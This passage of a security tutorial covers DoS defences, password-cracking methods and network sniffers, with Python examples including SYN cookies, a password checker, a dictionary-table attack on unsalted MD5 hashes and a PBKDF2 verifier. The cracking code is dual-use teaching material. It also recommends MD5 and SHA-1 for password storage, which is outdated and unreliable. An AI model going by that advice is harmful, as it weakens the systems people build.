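    flows.append(("udp", "203.0.113.200", 53, "192.0.2.20", 50123, 120))   # its answer
    return flows
```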
Unintentional attack
This describes a situation where a website ends up denied, not due to a deliberate attack by a single individual or group of individuals, but simply due to a sudden enormous spike in popularity. This can happen when an extremely popular website posts a prominent link to a second, less well-prepared site, for example, as part of a news story. The result is that a significant proportion of the primary site's regular users — potentially hundreds of thousands of people — click that link in the space of a few hours, having the same effect on the target website as a DDoS attack. News sites and link sites — sites whose primary function is to provide links to interesting content elsewhere on the Internet — are most likely to cause this phenomenon. The canonical example is the Slashdot effect. Sites such as Digg, Fark, Something Awful and the webcomic Penny Arcade have their own corresponding "effects", known as "the Digg effect", "farking", "goonrushing" and "wanging", respectively. Routers have also been known to create unintentional DoS attacks, as both D-Link and Netgear routers have created NTP vandalism by flooding NTP servers without respecting the restrictions of client types or geographical limitations.
Incidents
The first major attack involving DNS servers as reflectors occurred in January 2001. The attack was directed at the site Register.com. This attack, which forged requests for the MX records of AOL.com (to amplify the attack), lasted about a week before it could be traced back to all attacking hosts and shut off. It used a list of tens of thousands of DNS servers that was at least a year old (at the time of the attack). In July 2002, the Honeynet Project Reverse Challenge was issued. The binary that was analyzed turned out to be yet another DDoS agent, which implemented several DNS related attacks, including an optimized form of a reflection attack...
Effects
Denial of Service attacks can also lead to problems in the network 'branches' around the actual computer being attacked. For example, the bandwidth of a router between the Internet and a LAN may be consumed by a DoS, meaning not only will the intended computer be compromised, but the entire network will also be disrupted. This is another, more complex form of the DDoS, wherein the "zombies" can be located on the target system itself, thus increasing network traffic on either side of the target. If the DoS is conducted on a sufficiently large scale, entire geographical swathes of Internet connectivity can also be compromised by incorrectly configured or flimsy network infrastructure equipment without the attacker's knowledge or intent. For this reason, most, if not all, ISPs ban the practice.
Common malware
• Stacheldraht
• Tribe Flood Network
• Trinoo
Prevention and response
Surviving attacks
The investigative process should begin immediately after the DoS attack begins. There will be multiple phone calls, call backs, emails, pages and faxes between the victim organization, its provider and others involved. It is a time consuming process, so it should begin immediately. It has taken some very large networks with plenty of resources several hours to halt a DDoS. The easiest way to survive an attack is to have planned for the attack. Having a separate emergency block of IP addresses for critical servers with a separate route can be invaluable. A separate route (perhaps a DSL line) is not that extravagant, and it can be used for load balancing or sharing under normal circumstances and switched to emergency mode in the event of an attack. Filtering is generally pretty ineffective, as the route to the filter will normally be swamped so only a trickle of traffic will survive.
SYN cookies
SYN cookies modify the TCP protocol handling of the server by delaying allocation of resources until the client address has been verified. This seems to be the most powerful defense against SYN attacks. There are Solaris and Linux implementations. The Linux implementation can be turned on during runtime of the Linux kernel.
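As an added example (not code from the original text), the following Python simulates the stateless behaviour SYN cookies give a server: the SYN-ACK's sequence number is a keyed MAC over the connection 4-tuple and a coarse timestamp, and nothing is stored until a valid ACK comes back, so spoofed SYNs cost no memory. The bit layout, MSS table, addresses and key handling are constructed for illustration and do not reproduce the Linux or Solaris implementation.

```python
# Stateless SYN cookie simulation: no per-half-open-connection state (constructed layout).
import hashlib
import hmac
import os
import time

SECRET = os.urandom(32)                 # per-boot server key (rotate periodically)
MSS_TABLE = (536, 1300, 1440, 1460)     # MSS values the 3-bit field can encode (constructed)
TICK_SECONDS = 64                       # coarse clock: one counter step per 64 s
MAX_AGE_TICKS = 1                       # cookies older than this are refused


def _mac(src, sport, dst, dport, tick):
    """24-bit keyed MAC over the 4-tuple and the time counter."""
    msg = f"{src}:{sport}>{dst}:{dport}|{tick}".encode()
    return hmac.new(SECRET, msg, hashlib.sha256).digest()[:3]


def _tick(now):
    return int(now // TICK_SECONDS) & 0x1F          # 5-bit wrapping counter


def make_cookie(src, sport, dst, dport, client_mss, now=None):
    """Build the ISN sent in the SYN-ACK.  Layout (constructed): 5-bit tick |
    3-bit MSS index | 24-bit MAC.  The server keeps no record of this SYN."""
    now = time.time() if now is None else now
    tick = _tick(now)
    mss_idx = 0
    for i, mss in enumerate(MSS_TABLE):
        if mss <= client_mss:
            mss_idx = i                             # largest table entry not above the client's MSS
    mac = int.from_bytes(_mac(src, sport, dst, dport, tick), "big")
    return (tick << 27) | (mss_idx << 24) | mac


def check_cookie(src, sport, dst, dport, ack, now=None):
    """Validate the ACK of the third handshake packet.  Returns the MSS to use
    if the cookie is genuine and fresh, else None; only on success would the
    server allocate a connection record."""
    now = time.time() if now is None else now
    isn = (ack - 1) & 0xFFFFFFFF                    # the client acknowledges ISN+1
    tick, mss_idx = isn >> 27, (isn >> 24) & 0x7
    mac = (isn & 0xFFFFFF).to_bytes(3, "big")
    if ((_tick(now) - tick) & 0x1F) > MAX_AGE_TICKS or mss_idx >= len(MSS_TABLE):
        return None                                 # stale, or a field we never emit
    if not hmac.compare_digest(mac, _mac(src, sport, dst, dport, tick)):
        return None                                 # forged, or replayed on another 4-tuple
    return MSS_TABLE[mss_idx]


def simulate_flood(spoofed_syns, honest_client, server=("192.0.2.10", 80)):
    """Constructed scenario: many SYNs from spoofed sources plus one honest
    client.  Returns (connections_allocated, syn_acks_sent)."""
    dst, dport = server
    t0 = 1_700_000_000.0
    syn_acks = 0
    for src, sport in spoofed_syns:
        make_cookie(src, sport, dst, dport, 1460, now=t0)   # costs a reply, no memory
        syn_acks += 1
    src, sport = honest_client
    isn = make_cookie(src, sport, dst, dport, 1460, now=t0)
    syn_acks += 1
    allocated = []
    mss = check_cookie(src, sport, dst, dport, (isn + 1) & 0xFFFFFFFF, now=t0 + 10)
    if mss is not None:                             # spoofed sources never send this ACK
        allocated.append((src, sport, mss))
    return len(allocated), syn_acks
```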
Firewalls
Firewalls have simple rules such as to allow or deny protocols, ports or IP addresses. DoS attacks are too complex for today's firewalls. For example, if there is an attack on port 80 (web service), firewalls cannot prevent that attack because they cannot distinguish good traffic from DoS attack traffic. Additionally, firewalls are too deep in the network hierarchy. Your router may be affected even before the firewall gets the traffic. Modern stateful firewalls like Check Point FW1 NGX and Cisco PIX have a built-in capability to differentiate good traffic from DoS attack traffic. This capability is known as a "Defender", as it confirms TCP connections are valid before proxying TCP packets to service networks (including border routers).
Switches
Most switches have some rate-limiting and ACL capability. Some switches provide automatic and/or system-wide rate limiting, traffic shaping, delayed binding (TCP splicing), deep packet inspection and Bogon filtering (bogus IP filtering) to detect and remediate denial of service attacks through automatic rate filtering and WAN link failover and balancing. These schemes will work as long as the DoS attacks are something that can be prevented using them. For example, a SYN flood can be prevented using delayed binding or TCP splicing. Similarly, content based DoS can be prevented using deep packet inspection. Attacks originating from dark addresses or going to dark addresses can be prevented using Bogon filtering. Automatic rate filtering can work as long as you have set rate thresholds correctly and granularly. WAN link failover will work as long as both links have a DoS/DDoS prevention mechanism.
Routers
Similar to switches, routers have some rate-limiting and ACL capability. They too are manually set. Most routers can be easily overwhelmed under a DoS attack. If you add rules to take flow statistics out of the router during the DoS attacks, they further slow down and complicate the matter. Cisco IOS has features that prevent flooding, i.e. example settings
Application front end hardware
Application front end hardware is intelligent hardware placed on the network before traffic reaches the servers. It can be used on networks in conjunction with routers and switches. Application front end hardware analyzes data packets as they enter the system, and then identifies them as priority, regular, or dangerous. There are more than 25 bandwidth management vendors. Hardware acceleration is key to bandwidth management. Look for granularity of bandwidth management, hardware acceleration, and automation while selecting an appliance.
IPS based prevention
Intrusion-prevention systems are effective if the attacks have signatures associated with them. However, the trend among the attacks is to have legitimate content but bad intent. IPS systems which work on content recognition cannot block behavior based DoS attacks. An ASIC based IPS can detect and block denial of service attacks because it has the processing power and the granularity to analyze the attacks and act like a circuit breaker in an automated way. A rate-based IPS (RBIPS) must analyze traffic granularly and continuously monitor the traffic pattern and determine if there is a traffic anomaly. It must let the legitimate traffic flow while blocking the DoS attack traffic.
Passwords
Passwords to access computer systems are usually stored, typically not in cleartext form, in a database so the system can perform password verification when users attempt to log in. To preserve confidentiality of system passwords, the password verification data is typically generated by applying a one-way function to the password, possibly in combination with other data. For simplicity in this discussion, when the one-way function (which may be either an encryption function or a cryptographic hash) does not incorporate a secret key, other than the password, we will refer to the one-way function employed as a hash and its output as a hashed password. Even though functions that create hashed passwords may be cryptographically secure, possession of a hashed password provides a quick way to test guesses for the password by applying the function to each guess, and comparing the result to the verification data. The most commonly used hash functions can be computed rapidly and the attacker can test guesses repeatedly with different guesses until one succeeds, meaning the plaintext password has been recovered. The term password cracking is typically limited to recovery of one or more plaintext passwords from hashed passwords. Password cracking requires that an attacker can gain access to a hashed password, either by reading the password verification database (e.g., via a Trojan horse, virus program, or social engineering) or intercepting a hashed password sent over an open network, or has some other way to rapidly and without limit test whether a guessed password is correct. Without the hashed version of a password, the attacker can still attempt access to the computer system in question with guessed passwords. However, well designed systems limit the number of failed access attempts and can alert administrators to trace the source of the attack if that quota is exceeded.
With the hashed password, the attacker can work undetected, and if the attacker has obtained several hashed passwords, the chances of cracking at least one are quite high. There are also many other ways of obtaining passwords illicitly, such as social engineering, wiretapping, keystroke logging, login spoofing, dumpster diving, phishing, shoulder surfing, timing attacks, acoustic cryptanalysis, identity management system attacks and compromising host security (see password for details). However, cracking usually designates a guessing attack.
Cracking may be combined with other techniques. For example, use of a hash-based challenge-response authentication method for password verification may provide a hashed password to an eavesdropper, who can then crack the password. A number of stronger cryptographic protocols exist that do not expose hashed passwords during verification over a network, either by protecting them in transmission using a high-grade key, or by using a zero-knowledge password proof.
Principal attack methods
Weak encryption
If a system uses a cryptographically weak function to hash or encrypt passwords, exploiting that weakness can recover even 'well-chosen' passwords. Decryption need not be a quick operation, and can be conducted while not connected to the target system. Any 'cracking' technique of this kind is considered successful if it can decrypt the password in fewer operations than would be required by a brute force attack (see below). The fewer operations required, the "weaker" the encryption is considered to be (for equivalently well chosen passwords). One example is the LM hash that Microsoft Windows uses by default to store user passwords that are less than 15 characters in length. LM hash breaks the password into two 7-character fields which are then hashed separately, allowing each half to be attacked separately. Progress in cryptography has made available functions which are believed to actually be "one way" hashes, such as MD5 or SHA-1. These are thought to be impossible to invert in practice. When quality implementations of good cryptographic hash functions are correctly used for authentication, password cracking through decryption can be considered infeasible.
Guessing
Not surprisingly, many users choose weak passwords, usually one related to themselves in some way. Repeated research over some 40 years has demonstrated that around 40% of user-chosen passwords are readily guessable by programs. Examples of insecure choices include:
• blank (none)
• the words "password", "passcode", "admin" and their derivatives
• the user's name or login name
• the name of their significant other or another relative
• their birthplace or date of birth
• a pet's name
• automobile licence plate number
• a simple modification of one of the preceding, such as suffixing a digit or reversing the order of the letters
• a row of letters from a standard keyboard layout (eg, the qwerty keyboard - qwerty itself, asdf, or qwertyuiop) and so on.
Some users even neglect to change the default password that came with their account on the computer system. And some administrators neglect to change default account passwords provided by the operating system vendor or hardware supplier. A famous example is the use of FieldService as a user name with Guest as the password. If not changed at system configuration time, anyone familiar with such systems will have 'cracked' an important password; such service accounts often have higher access privileges than a normal user account. The determined cracker can easily develop a computer program that accepts personal information about the user being attacked and generates common variations for passwords suggested by that information.
Dictionary attack
A dictionary attack also exploits the tendency of people to choose weak passwords, and is related to the previous attack. Password cracking programs usually come equipped with "dictionaries", or word lists, with thousands or even millions of entries of several kinds, including:
• words in various languages
• names of people
• places
• commonly used passwords
The cracking program encrypts each word in the dictionary, and simple modifications of each word, and checks whether any match an encrypted password. This is feasible because the attack can be automated and, on inexpensive modern computers, several thousand possibilities can be tried per second. Guessing, combined with dictionary attacks, has been repeatedly and consistently demonstrated for several decades to be sufficient to crack perhaps as many as 50% of all account passwords on production systems.
Brute force attack
A last resort is to try every possible password, known as a brute force attack. In theory, a brute force attack will always be successful since the rules for acceptable passwords must be publicly known, but as the length of the password increases, so does the number of possible passwords. This method is unlikely to be practical unless the password is relatively small. But, how small is too small? A common current length recommendation is 8 or more randomly chosen characters combining letters, numbers, and special (punctuation, etc) characters. Systems which limit passwords to numeric characters only, or upper case only, or, generally, which exclude possible password character choices make such attacks easier. Using longer passwords in such cases (if possible on a particular system) can compensate for a limited allowable character set. And, of course, even with an adequate range of character choice, users who ignore that range (using only upper case alphabetic characters, or digits alone, for instance) make brute force attacks much easier against those password choices. Generic brute-force search techniques can be used to speed up the computation. But the real threat is likely to be from smart brute-force techniques that exploit knowledge about how people tend to choose passwords. NIST SP 800-63 (2) provides further discussion of password quality, and suggests, for example, that an 8 character user-chosen password may provide somewhere between 18 and 30 bits of entropy, depending on how it is chosen. Note: this number is very far below what is generally considered to be safe for an encryption key.
How small is too small thus depends partly on an attacker's ingenuity and resources (e.g., available time, computing power, etc.), the latter of which will increase as computers get faster. Most commonly used hashes can be implemented using specialized hardware, allowing faster attacks. Large numbers of computers can be harnessed in parallel, each trying a separate portion of the search space. Unused overnight and weekend time on office computers can also be used for this purpose. The distinction between guessing, dictionary and brute force attacks is not strict. They are similar in that an attacker goes through a list of candidate passwords one by one; the list may be explicitly enumerated or implicitly defined, may or may not incorporate knowledge about the victim, and may or may not be linguistically derived. Each of the three approaches, particularly 'dictionary attack', is frequently used as an umbrella term to denote all three attacks and the spectrum of attacks encompassed by them.
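An added example (not the author's code) that turns the weak choices listed under Guessing and the length recommendation under Brute force attack into an acceptance check run at the moment a password is set, so a password derived from the user's own details is refused before it can be guessed. The profile field names, the date-of-birth format and the thresholds are assumptions made here.

```python
# Password acceptance check built from the weak choices listed in the text (constructed policy).
import re

COMMON_WORDS = ("password", "passcode", "admin", "guest", "fieldservice")
KEYBOARD_ROWS = ("qwertyuiop", "asdfghjkl", "zxcvbnm", "1234567890", "qwertzuiop", "azertyuiop")
PROFILE_FIELDS = ("username", "first_name", "last_name", "partner", "relative", "pet",
                  "birthplace", "plate")            # assumed field names
MIN_LENGTH = 8          # the length recommendation given under "Brute force attack"
MIN_CLASSES = 3         # of: lower case, upper case, digits, punctuation/other


def _normalise(text):
    return re.sub(r"[^a-z0-9]", "", text.lower())


def _keyboard_runs(length=4):
    runs = set()
    for row in KEYBOARD_ROWS:
        for i in range(len(row) - length + 1):
            runs.add(row[i:i + length])
            runs.add(row[i:i + length][::-1])
    return runs


KEYBOARD_RUNS = _keyboard_runs()


def profile_words(profile):
    """Map each word a guessing program could derive from the user's own details
    to the profile field it came from."""
    words = {}
    for field in PROFILE_FIELDS:
        value = _normalise(profile.get(field, ""))
        if len(value) >= 4:                  # shorter values match too much by accident
            words[value] = field
    dob = profile.get("dob")                 # assumed format: YYYY-MM-DD
    if dob:
        y, m, d = dob.split("-")
        for w in (y, d + m + y, m + d + y, y + m + d, d + m + y[2:], d + m):
            words[w] = "dob"
    return words


def check_password(candidate, profile):
    """Return the list of reasons a password is refused; an empty list means accepted.
    A candidate counts as 'derived from' a word when it contains that word or its
    reversal, which covers the digit-suffix, capitalisation and reversal tricks."""
    if candidate == "":
        return ["blank password"]
    reasons = []
    low = candidate.lower()
    stripped = _normalise(candidate)
    if len(candidate) < MIN_LENGTH:
        reasons.append(f"shorter than {MIN_LENGTH} characters")
    classes = sum(bool(re.search(p, candidate))
                  for p in (r"[a-z]", r"[A-Z]", r"[0-9]", r"[^A-Za-z0-9]"))
    if classes < MIN_CLASSES:
        reasons.append(f"uses fewer than {MIN_CLASSES} character classes")
    for word in COMMON_WORDS:
        if word in stripped or word[::-1] in stripped:
            reasons.append(f"contains the common word '{word}'")
    if any(run in low for run in KEYBOARD_RUNS):
        reasons.append("contains a keyboard-row sequence")
    for word, field in profile_words(profile).items():
        if word in stripped or word[::-1] in stripped:
            reasons.append(f"derived from the user's {field}")
    return reasons
```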
Precomputation
In its most basic form, precomputation involves hashing each word in the dictionary (or any search space of candidate passwords) and storing the resulting (word, ciphertext) pairs in a way that enables lookup on the ciphertext field. This way, when a new encrypted password is obtained, password recovery is instantaneous. Precomputation can be very useful for a dictionary attack if salt is not used properly (see below), and the dramatic decrease in the cost of mass storage has made it practical for fairly large dictionaries. Advanced precomputation methods exist that are even more effective. By applying a time-memory tradeoff, a middle ground can be reached: a search space of size N can be turned into an encrypted database of size O(N^(2/3)) in which searching for an encrypted password takes time O(N^(2/3)). The theory has recently been refined into a practical technique, and the online implementation at http://passcracking.com/ achieves impressive results on 8 character alphanumeric MD5 hashes. Another example [1] cracks alphanumeric Windows LAN Manager passwords in a few seconds. This is much faster than brute force attacks on the obsolete LAN Manager, which uses a particularly weak method of hashing the password. Current Windows systems still compute and store a LAN Manager hash by default for backwards compatibility [2]. A technique similar to precomputation, known generically as memoization, can be used to crack multiple passwords at the cost of cracking just one. Since encrypting a word takes much longer than comparing it with a stored word, a lot of effort is saved by encrypting each word only once and comparing it with each of the encrypted passwords using an efficient list search algorithm. The two approaches may of course be combined: the time-space tradeoff attack can be modified to crack multiple passwords simultaneously in a shorter time than cracking them one after the other.
Salting
The benefits of precomputation and memoization can be nullified by randomizing the hashing process. This is known as salting. When the user sets a password, a short, random string called the salt is suffixed to the password before encrypting it; the salt is stored along with the encrypted password so that it can be used during verification. Since the salt is usually different for each user, the attacker can no longer construct tables with a single encrypted version of each candidate password. Early Unix systems used a 12-bit salt. Attackers could still build tables with common passwords encrypted with all 4096 possible 12-bit salts. However, if the salt is long enough (e.g. 32 bits), there are too many possibilities and the attacker must repeat the encryption of every guess for each user.
Early Unix password vulnerability
Early Unix implementations used a 12-bit salt, which allowed for 4096 possibilities, and limited passwords to 8 characters. While 12 bits was good enough for most purposes in the 1970s (although some expressed doubts even then), by 2005 disk storage had become cheap enough that an attacker could precompute encryptions of millions of common passwords, including all 4096 possible salt variations for each password, and store the precomputed values on a single portable hard drive. An attacker with a larger budget can build a disk farm with all 6 character passwords and the most common 7 and 8 character passwords stored in encrypted form, for all 4096 possible salts. And when several thousand passwords are being cracked at once, memoization still offers some benefit. Since there is little downside to using a longer (say 32-, 64- or 128-bit) salt, and it renders any precomputation or memoization hopeless, modern implementations choose to do so.
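An added example, not part of the original text, showing the precomputation and memoization attack of the previous sections against unsalted hashes and why a per-user salt forces the work to be repeated for every account. The word list, the accounts and the hash choices (MD5 for the legacy unsalted store, SHA-256 with a 16-byte suffixed salt) are constructed for the demonstration.

```python
# Lookup-table (precomputation) attack on unsalted hashes, and the per-user salt that defeats it.
import hashlib
import os

# Constructed word list and accounts; every hash below is computed here, not taken from a system.
WORDLIST = ["letmein", "sunshine", "dragon", "qwerty", "hunter2", "Venus", "fieldservice", "trustno1"]


def unsalted_hash(password):
    """Legacy storage: the same password always yields the same hash."""
    return hashlib.md5(password.encode()).hexdigest()


def salted_hash(password, salt):
    """Salt stored beside the hash; suffixed to the password as the text describes."""
    return hashlib.sha256(password.encode() + salt).hexdigest()


def build_table(words):
    """Precomputation: hash every candidate once, index by hash for O(1) lookup."""
    return {unsalted_hash(w): w for w in words}


def recover_from_table(table, stored_hashes):
    """Memoized attack: one table serves every target; each lookup is a dictionary hit."""
    return {h: table.get(h) for h in stored_hashes}


def recover_salted(words, stored):
    """stored: {user: (salt, hash)}.  Every guess must be re-hashed per user, so
    the work grows with users x candidates instead of candidates alone.
    Returns (recovered, hash_operations)."""
    recovered, work = {}, 0
    for user, (salt, h) in stored.items():
        for w in words:
            work += 1
            if salted_hash(w, salt) == h:
                recovered[user] = w
                break
    return recovered, work


def table_entries(words, salt_bits):
    """Table size needed to stay 'instantaneous' against an n-bit salt
    (the 12-bit Unix salt means 4096 copies of every word)."""
    return len(words) * 2 ** salt_bits


def demo():
    """Three constructed accounts stored both ways; returns what each attack achieves."""
    accounts = {"alice": "sunshine", "bob": "dragon", "carol": "Venus"}
    unsalted = {u: unsalted_hash(p) for u, p in accounts.items()}
    salted = {}
    for u, p in accounts.items():
        salt = os.urandom(16)                        # 128-bit salt, different per user
        salted[u] = (salt, salted_hash(p, salt))
    table = build_table(WORDLIST)
    hits_unsalted = recover_from_table(table, unsalted.values())
    hits_on_salted = recover_from_table(table, [h for _, h in salted.values()])
    recovered, work = recover_salted(WORDLIST, salted)
    return {
        "table_cracked": sum(v is not None for v in hits_unsalted.values()),
        "table_vs_salted": sum(v is not None for v in hits_on_salted.values()),
        "per_user_work": work,
        "recovered_salted": recovered,
    }
```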
Prevention
The best method of preventing password cracking is to ensure that attackers cannot get access even to the encrypted password. For example, on the Unix operating system, encrypted passwords were originally stored in a publicly accessible file "/etc/passwd". On modern Unix (and similar) systems, on the other hand, they are stored in the file "/etc/shadow", which is accessible only to programs running with enhanced privileges (ie, 'system' privileges). This makes it harder for a malicious user to obtain the encrypted passwords in the first instance. Unfortunately, many common network protocols transmit the hashed passwords to allow remote authentication. Even if the attacker has no access to the password database itself, every attacker should also be prevented from being able to use the system itself to check a large number of passwords in a relatively small amount of time. For this reason, many systems include a significant forced delay (a few seconds is generally sufficient) between the entry of the password and returning a result. Also, it is a good policy to (temporarily) lock out an account that has been subjected to 'too many' incorrect password guesses, although this could be exploited to launch a denial of service attack. Too many in this context is frequently taken to be something like more than 3 failed attempts in 90 seconds, or more than a dozen failed attempts in an hour.
It is also imperative to choose good passwords (see password for more information) and a good encryption or hash algorithm that has stood the test of time. AES, SHA-1, and MD5 are common choices. Good implementations, including adequate salt, are also required. Key derivation functions, such as PBKDF2, are hashes that consume relatively large amounts of computer time so as to slow down the rate at which an attacker can test guesses, even if the hashed password is available. This process is known as key strengthening. However, no amount of effort put into preventing password cracking can be sufficient without a well-designed and well-implemented security policy. The canonical and all too common example of this is the user who leaves their password on a Post-It note stuck to their monitor or under their keyboard. Even sophisticated users who have been warned repeatedly are known to have such lapses.
Password cracking programs
• Ophcrack
Ophcrack is an Open Source (GPL License) program that cracks Windows LM hashes using rainbow tables. It can crack 99.9% of alphanumeric passwords of up to 14 characters in usually a few seconds, and at most a few minutes. There is also a LiveCD version which automates the retrieval, decryption, and cracking of passwords from a Windows system. Starting with version 2.3, Ophcrack also cracks NT hashes.
• Crack
Crack is a Unix password cracking program designed to allow system administrators to locate users who may have weak passwords vulnerable to a dictionary attack. Crack began in 1990 when Alec Muffett, a Unix system administrator at the University of Wales Aberystwyth, was trying to improve Dan Farmer's 'pwc' cracker in COPS and found that by re-engineering its memory management he got a noticeable performance increase. This led to a total rewrite which became "Crack v2.0" and further development to improve usability.
• Cain and Abel
Cain and Abel is a Windows password recovery tool. It can recover many kinds of passwords using methods such as network packet sniffing, and cracking various password hashes by using methods such as dictionary attacks, brute force and cryptanalysis attacks. Cryptanalysis attacks are done via rainbow tables which can be generated with the winrtgen.exe program provided with Cain. Cain and Abel is maintained by Massimiliano Montoro.
• John the Ripper
John the Ripper is a free password cracking software tool. Initially developed for the UNIX operating system, it currently runs on fifteen different platforms (11 flavors of Unix, counting each flavor only once for all the architectures it supports, DOS, Win32, BeOS, and OpenVMS). It is one of the most popular password testing/breaking programs as it combines a number of password crackers into one package, autodetects, and includes a customisable cracker. It can be run against various encrypted password formats including several crypt password hash types most commonly found on various Unix flavors (based on DES, MD5, or Blowfish), Kerberos AFS, and the Windows NT/2000/XP/2003 LM hash. Additional modules have extended its ability to include MD4-based password hashes and passwords stored in LDAP, MySQL and others. John the Ripper is a perfectly safe program to install and run on your computer. If you are running a multi-user system, you should make sure you are shadowing your password file such that the hashes are not visible; however, even if you are not, not installing John will not prevent a malicious user from running John on their own computer with your hashes.
• LC5 (formerly L0phtCrack)
L0phtCrack is a password auditing and recovery application (now called LC5), originally produced by Mudge from L0pht Heavy Industries. It is used to test password strength and sometimes to recover lost Microsoft Windows passwords, by using dictionary, brute-force, and hybrid attacks. It was one of the crackers' tools of choice, although most use old versions because of its price and low availability. The application was produced by @stake after the L0pht merged with @stake in 2000. @stake was acquired by Symantec in 2004. Symantec has since stopped selling this tool to new customers citing US Government export regulations, and has announced that they will discontinue support by the end of 2006. LC5 can still be found at SecTools.Org and other unofficial mirrors.
• RainbowCrack
RainbowCrack is the name of a computer program which performs password cracking. RainbowCrack differs from "conventional" brute force crackers in that it uses large precomputed files called rainbow tables to reduce the length of time needed to crack a password drastically. RainbowCrack was developed by Zhu Shuanglei, and implements an improved time-memory trade-off cryptanalysis attack which originated in Philippe Oechslin's Ophcrack.
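An added example (not from the page) of the Prevention section's advice: PBKDF2 key strengthening with an adequate salt, a constant-time comparison, and a lockout policy using the page's thresholds of more than 3 failures in 90 seconds or more than a dozen in an hour. The storage format, the iteration count and the dummy-hash handling for unknown users are choices made for this example.

```python
# Verifier with PBKDF2 key strengthening, constant-time compare and the text's lockout thresholds.
import hashlib
import hmac
import os
from collections import deque

ITERATIONS = 600_000            # choose so one derivation costs ~0.1 s on the server hardware
SALT_BYTES = 16                 # 128-bit salt, as the Salting section recommends


def hash_password(password, iterations=ITERATIONS):
    """Constructed storage format: pbkdf2_sha256$<iterations>$<salt hex>$<key hex>."""
    salt = os.urandom(SALT_BYTES)
    key = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${key.hex()}"


def verify_password(password, stored):
    """Re-derive with the stored salt and iteration count; the cost is paid per guess,
    which is what slows an offline attacker holding the hash."""
    algo, iterations, salt_hex, key_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    key = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(key, bytes.fromhex(key_hex))   # no early exit on a mismatch


# Verifying against a throwaway hash for unknown users keeps the response time the
# same whether or not the account exists, so the prompt does not leak usernames.
DUMMY_STORED = hash_password("dummy")


class LockoutPolicy:
    """'Too many' as the text puts it: more than 3 failures in 90 s or more than 12 in an hour."""
    WINDOWS = ((90, 3), (3600, 12))       # (seconds, failures allowed)

    def __init__(self):
        self._failures = {}               # user -> deque of failure timestamps

    def is_locked(self, user, now):
        recent = self._failures.get(user, ())
        return any(sum(1 for t in recent if now - t <= secs) > limit
                   for secs, limit in self.WINDOWS)

    def record_failure(self, user, now):
        q = self._failures.setdefault(user, deque())
        q.append(now)
        longest = max(secs for secs, _ in self.WINDOWS)
        while q and now - q[0] > longest:
            q.popleft()                   # forget failures outside the longest window

    def reset(self, user):
        self._failures.pop(user, None)


def attempt_login(db, policy, user, password, now):
    """Return 'locked', 'ok' or 'bad'.  A locked account is refused before the
    password is examined, so no KDF time is spent on guesses against it.  As
    the text warns, an attacker can also trigger this lock deliberately."""
    if policy.is_locked(user, now):
        return "locked"
    stored = db.get(user, DUMMY_STORED)
    if verify_password(password, stored) and user in db:
        policy.reset(user)
        return "ok"
    policy.record_failure(user, now)
    return "bad"
```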
Sniffers: Basics and Detection
“If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained you will also suffer a defeat. If you know neither the enemy nor yourself, you will succumb in every battle.”
Introduction
A sniffer is a program or a device that eavesdrops on the network traffic by grabbing information traveling over a network. Sniffers basically are "data interception" technology. They work because Ethernet was built around a principle of sharing. Most networks use broadcast technology wherein messages for one computer can be read by another computer on that network. In practice, all the other computers except the one for which the message is meant will ignore that message. However, computers can be made to accept messages even if they are not meant for them. This is done by means of a sniffer! Many people assume computers connected to a switch are safe from sniffing. Nothing could be further from the truth. Computers connected to switches are just as vulnerable to sniffing as those connected to a hub. This article seeks to explore the topic of sniffers, how they work, and detecting and protecting your assets against the malicious use of these programs. Finally, towards the end we will talk about some commonly available sniffers.
How A Sniffer Works
A computer connected to the LAN has two addresses. One is the MAC (Media Access Control) address that uniquely identifies each node in a network and is stored on the network card itself. It is the MAC address that gets used by the Ethernet protocol while building "frames" to transfer data to and from a machine. The other is the IP address, which is used by applications. The Data Link Layer uses an Ethernet header with the MAC address of the destination machine rather than the IP address. The Network Layer is responsible for mapping IP network addresses to the MAC address as required by the Data Link Protocol. It initially looks up the MAC address of the destination machine in a table, usually called the ARP (Address Resolution Protocol) cache. If no entry is found for the IP address, the Address Resolution Protocol broadcasts a request packet (ARP request) to all machines on the network. The machine with that address responds to the source machine with its MAC address. This MAC address then gets added to the source machine's ARP cache. The source machine in all its communications with the destination machine then uses this MAC address.
There are two basic types of Ethernet environments, and how sniffers work in both these cases is slightly different.
Shared Ethernet: In a shared Ethernet environment, all hosts are connected to the same bus and compete with one another for bandwidth. In such an environment packets meant for one machine are received by all the other machines. Thus when a machine Venus
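The frame-level mechanics described above, as an added example that is not from the original article: a network card in normal mode only passes up frames addressed to its own MAC, to the broadcast address or to a multicast group, whereas a sniffer puts the card in promiscuous mode and takes every frame on the segment; separately, ARP resolves an IP address to a MAC address and the answer lands in the ARP cache. All MACs, IP addresses and frames below are constructed sample data, not captured traffic.

```python
import struct

BROADCAST = bytes.fromhex("ffffffffffff")
ETHERTYPE_ARP = 0x0806
ETHERTYPE_IPV4 = 0x0800

# Constructed hosts on one shared segment (locally administered MACs).
MAC_A, IP_A = bytes.fromhex("020000000001"), "10.0.0.1"
MAC_B, IP_B = bytes.fromhex("020000000002"), "10.0.0.2"
MAC_C = bytes.fromhex("020000000003")          # third host, runs the sniffer


def ip_bytes(ip: str) -> bytes:
    return bytes(int(o) for o in ip.split("."))


def build_arp(op: int, sha: bytes, spa: str, tha: bytes, tpa: str) -> bytes:
    """Encode an ARP packet for IPv4 over Ethernet (RFC 826 field order)."""
    return struct.pack("!HHBBH6s4s6s4s", 1, ETHERTYPE_IPV4, 6, 4, op,
                       sha, ip_bytes(spa), tha, ip_bytes(tpa))


def build_frame(dst: bytes, src: bytes, ethertype: int, payload: bytes) -> bytes:
    """Prepend an Ethernet II header: dst MAC, src MAC, EtherType."""
    return struct.pack("!6s6sH", dst, src, ethertype) + payload


def parse_ethernet(frame: bytes) -> dict:
    if len(frame) < 14:
        raise ValueError("frame too short for an Ethernet header")
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    return {"dst": dst, "src": src, "ethertype": ethertype, "payload": frame[14:]}


def parse_arp(payload: bytes) -> dict:
    if len(payload) < 28:
        raise ValueError("ARP payload too short")
    htype, ptype, hlen, plen, op, sha, spa, tha, tpa = struct.unpack(
        "!HHBBH6s4s6s4s", payload[:28])
    if (htype, ptype, hlen, plen) != (1, ETHERTYPE_IPV4, 6, 4):
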